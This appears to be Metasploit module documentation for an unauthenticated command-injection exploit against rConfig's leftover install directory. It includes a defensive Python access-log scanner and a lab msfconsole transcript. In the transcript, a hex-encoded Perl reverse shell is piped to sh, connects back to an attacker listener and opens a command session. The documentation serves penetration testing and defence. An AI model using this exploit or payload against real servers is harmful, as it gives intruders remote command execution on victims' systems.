metasploit-gs/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md
2025-07-17 11:51:29 +01:00

Description

This module exploits an unauthenticated command injection vulnerability in rConfig versions 3.9.2 and prior. The install directory is not automatically removed after installation, allowing unauthenticated users to execute arbitrary commands via the ajaxServerSettingsChk.php file as the web server user.
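A leftover install directory shows up in the web server's access log whenever it is requested. The following added example (not part of the Metasploit module or of rConfig) scans access log lines for requests under the install path and reports which clients were served and which were blocked. It assumes Apache common/combined log format and the module's default base path of `/install/`; the function names and sample log lines are constructed for illustration.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache common/combined prefix: client, timestamp, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
HANDLER = "ajaxserversettingschk.php"  # file named in the description above

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2020:10:00:00 +0000] "GET /login.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2020:10:00:05 +0000] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php HTTP/1.1" 200 31',
    '203.0.113.9 - - [01/Jan/2020:10:00:09 +0000] "GET /install/%2e/lib/ajaxHandlers/ajaxServerSettingsChk.php HTTP/1.1" 403 199',
    '203.0.113.9 - - [01/Jan/2020:10:00:12 +0000] "GET //install/ HTTP/1.1" 200 4096',
]


def classify(line, install_uri="/install/"):
    """Return (client, verdict) for a request under install_uri, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    # Drop the query string, decode percent-escapes, collapse ./ and ../ and
    # repeated slashes, and lower-case, so padded or encoded forms of the
    # path compare equal to the plain one.
    path = posixpath.normpath(unquote(target.split("?", 1)[0]))
    path = "/" + path.lstrip("/").lower()
    base = install_uri.rstrip("/").lower()
    if path != base and not path.startswith(base + "/"):
        return None
    kind = "handler" if path.endswith("/" + HANDLER) else "install"
    state = "served" if status.startswith("2") else "blocked"
    return client, f"{kind}-{state}"


def summarise(lines, install_uri="/install/"):
    """Map each verdict to the sorted list of clients that triggered it."""
    hits = defaultdict(set)
    for line in lines:
        result = classify(line, install_uri)
        if result:
            hits[result[1]].add(result[0])
    return {verdict: sorted(clients) for verdict, clients in hits.items()}


if __name__ == "__main__":
    print(summarise(SAMPLE))
```

Any `-served` verdict means the install directory is still present and reachable without authentication; removing it after installation closes the path this module relies on.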

Vulnerable Software

This module has been tested successfully on rConfig version 3.9.2 on CentOS 7.7.1908 (x64).

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/unix/webapp/rconfig_install_cmd_exec
  3. Do: set rhosts <IP>
  4. Do: run
  5. You should get a new session

Options

TARGETURI

The base path to the rConfig install directory (default: /install/).

Scenarios

msf > use exploit/unix/webapp/rconfig_install_cmd_exec 
msf exploit(unix/webapp/rconfig_install_cmd_exec) > set rhosts 172.16.191.131
rhosts => 172.16.191.131
msf exploit(unix/webapp/rconfig_install_cmd_exec) > set verbose true
verbose => true
msf exploit(unix/webapp/rconfig_install_cmd_exec) > check

[*] Executing command: id
[*] Response: uid=48(apache) gid=48(apache) groups=48(apache)
[+] 172.16.191.131:443 - The target is vulnerable.
msf exploit(unix/webapp/rconfig_install_cmd_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)
   1   Automatic (Linux Dropper)


msf exploit(unix/webapp/rconfig_install_cmd_exec) > set target 0
target => 0
msf exploit(unix/webapp/rconfig_install_cmd_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(unix/webapp/rconfig_install_cmd_exec) > set lhost 172.16.191.165 
lhost => 172.16.191.165
msf exploit(unix/webapp/rconfig_install_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Executing command: id
[*] Response: uid=48(apache) gid=48(apache) groups=48(apache)
[*] Executing command: /bin/echo -ne '\x70\x65\x72\x6c\x20\x2d\x4d\x49\x4f\x20\x2d\x65\x20\x27\x24\x70\x3d\x66\x6f\x72\x6b\x3b\x65\x78\x69\x74\x2c\x69\x66\x28\x24\x70\x29\x3b\x66\x6f\x72\x65\x61\x63\x68\x20\x6d\x79\x20\x24\x6b\x65\x79\x28\x6b\x65\x79\x73\x20\x25\x45\x4e\x56\x29\x7b\x69\x66\x28\x24\x45\x4e\x56\x7b\x24\x6b\x65\x79\x7d\x3d\x7e\x2f\x28\x2e\x2a\x29\x2f\x29\x7b\x24\x45\x4e\x56\x7b\x24\x6b\x65\x79\x7d\x3d\x24\x31\x3b\x7d\x7d\x24\x63\x3d\x6e\x65\x77\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x28\x50\x65\x65\x72\x41\x64\x64\x72\x2c\x22\x31\x37\x32\x2e\x31\x36\x2e\x31\x39\x31\x2e\x31\x36\x35\x3a\x34\x34\x34\x34\x22\x29\x3b\x53\x54\x44\x49\x4e\x2d\x3e\x66\x64\x6f\x70\x65\x6e\x28\x24\x63\x2c\x72\x29\x3b\x24\x7e\x2d\x3e\x66\x64\x6f\x70\x65\x6e\x28\x24\x63\x2c\x77\x29\x3b\x77\x68\x69\x6c\x65\x28\x3c\x3e\x29\x7b\x69\x66\x28\x24\x5f\x3d\x7e\x20\x2f\x28\x2e\x2a\x29\x2f\x29\x7b\x73\x79\x73\x74\x65\x6d\x20\x24\x31\x3b\x7d\x7d\x3b\x27'|sh
[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.131:35004) at 2019-10-29 11:48:59 -0400

id
uid=48(apache) gid=48(apache) groups=48(apache)
uname -a
Linux localhost.localdomain 3.10.0-1062.4.1.el7.x86_64 #1 SMP Fri Oct 18 17:15:30 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
pwd
/home/rconfig/www/install/lib/ajaxHandlers
^C
Abort session 1? [y/N]  y
""

[*] 172.16.191.131 - Command shell session 1 closed.  Reason: User exit
msf exploit(unix/webapp/rconfig_install_cmd_exec) >